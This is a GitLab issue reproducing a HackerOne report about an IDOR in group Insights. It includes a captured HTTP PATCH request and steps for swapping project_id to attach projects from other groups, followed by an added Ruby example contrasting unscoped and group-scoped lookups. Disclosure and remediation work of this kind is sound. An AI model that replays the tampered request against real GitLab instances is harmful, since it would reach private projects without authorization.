Add private/public projects in group Insights

HackerOne report #626394 by ashish_r_padelkar on 2019-06-23, assigned to jritchey:

Summary

Hello,

There is a new feature available in Groups at https://gitlab.com/groups/<GroupName>/-/edit called Insights

Screenshot_2019-06-23_at_17.24.55.png

In this, you can select the projects available within a group. However, it is also possible to add public projects here, or even private projects which don't belong to this group, using this bug!

Private project names are not visible, though, if you don't have access to them.

Steps to reproduce

  1. As a group owner, navigate to https://gitlab.com/groups/<GroupName>/-/edit --> Insights
  2. Select the available projects and save.
  3. Capture the below request.
POST /newgroup_t HTTP/1.1  
Host: gitlab.com  
Connection: close  
Content-Length: 223  
Cache-Control: max-age=0  
Origin: https://gitlab.com  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3  
Referer: https://gitlab.com/groups/newgroup_t/-/edit  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: 1

utf8=%E2%9C%93&_method=patch&authenticity_token=1&group[insight_attributes][id]=7&group[insight_attributes][project_id]=12862937  
  4. Replace the value of group[insight_attributes][project_id] with any public/private project ID.

  5. Send the request. If it is a public project ID, then you should see the name when you reload. If it's private, then you will see a blank entry, but the project is added, as you can verify using view source, where you will find the project ID added to it.

What is the current bug behavior?

It is possible to add projects which don't belong to the group in the Insights section.

What is the expected correct behavior?

Only projects belonging to the group should be allowed to be added.

Output of checks

This bug happens on GitLab.com and maybe on omnibus installations too!

Regards,
Ashish

Impact

While it's possible to add a public/private project in the Insights section using IDOR, I am not completely sure about its overall impact, but fixing this might be useful for future bug cases that might occur because of this.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

  • Screenshot_2019-06-23_at_17.24.55.png
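The report describes a lookup that takes the submitted project_id at face value instead of restricting it to the group being edited. The following Ruby script is an added example written for this page, not GitLab's own code or its eventual fix: it parses the nested form body from the captured request, then contrasts an unscoped lookup (the behaviour the report describes) with a group-scoped one (the behaviour the report expects). All project and group IDs, the Project struct and the function names are constructed for the example.

```ruby
# Added example (not GitLab code): scoping an "insight project" update to the
# group being edited. Data and names below are constructed for illustration.
require 'cgi'

# Parse a Rails-style nested form body such as
#   group[insight_attributes][project_id]=12862937
# into nested hashes: {"group"=>{"insight_attributes"=>{"project_id"=>"12862937"}}}
def parse_nested_form(body)
  params = {}
  body.split('&').each do |pair|
    raw_key, raw_val = pair.split('=', 2)
    key = CGI.unescape(raw_key)
    val = CGI.unescape(raw_val.to_s)
    head = key[/\A[^\[]+/]                      # "group"
    rest = key.scan(/\[([^\]]*)\]/).flatten     # ["insight_attributes", "project_id"]
    path = [head, *rest]
    node = params
    path[0..-2].each { |k| node = (node[k] ||= {}) }
    node[path.last] = val
  end
  params
end

Project = Struct.new(:id, :group_id, :visibility)

# Constructed sample data: group 7 is the group whose Insights page is being
# edited; groups 42 and 43 are unrelated groups.
PROJECTS = [
  Project.new(7001, 7, :private),
  Project.new(7002, 7, :public),
  Project.new(9002, 42, :public),
  Project.new(9003, 43, :private)
].freeze

class InsightUpdateError < StandardError; end

def submitted_project_id(body)
  parse_nested_form(body).dig('group', 'insight_attributes', 'project_id').to_i
end

# Unscoped lookup, as described in the report: any existing project id is
# accepted, regardless of which group owns it or whether it is private.
def update_insight_unscoped(_group_id, body, projects)
  pid = submitted_project_id(body)
  project = projects.find { |p| p.id == pid }
  raise InsightUpdateError, 'project not found' unless project
  project.id
end

# Scoped lookup: the candidate set is the group's own projects, which is what
# the Insights UI offers in the first place. A single error message covers
# both "no such project" and "not in this group", so the response does not act
# as an oracle for whether a foreign private project id exists.
def update_insight_scoped(group_id, body, projects)
  pid = submitted_project_id(body)
  project = projects.find { |p| p.id == pid && p.group_id == group_id }
  raise InsightUpdateError, 'project not found in group' unless project
  project.id
end

# Constructed request bodies, shaped like the one captured in the report.
OWN_BODY     = 'utf8=%E2%9C%93&_method=patch&group[insight_attributes][id]=1&group[insight_attributes][project_id]=7001'
FOREIGN_BODY = 'utf8=%E2%9C%93&_method=patch&group[insight_attributes][id]=1&group[insight_attributes][project_id]=9003'

if __FILE__ == $PROGRAM_NAME
  puts "unscoped accepted: #{update_insight_unscoped(7, FOREIGN_BODY, PROJECTS)}"
  begin
    update_insight_scoped(7, FOREIGN_BODY, PROJECTS)
  rescue InsightUpdateError => e
    puts "scoped rejected: #{e.message}"
  end
  puts "scoped accepted own project: #{update_insight_scoped(7, OWN_BODY, PROJECTS)}"
end
```

Running the script shows the unscoped lookup accepting the other group's private project while the scoped lookup rejects it and accepts the group's own project. In a Rails application the same idea is expressed by building the lookup from an association on the current group rather than from the global model, so the group is part of the query rather than a check bolted on afterwards.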
Edited Jul 04, 2022 by Costel Maxim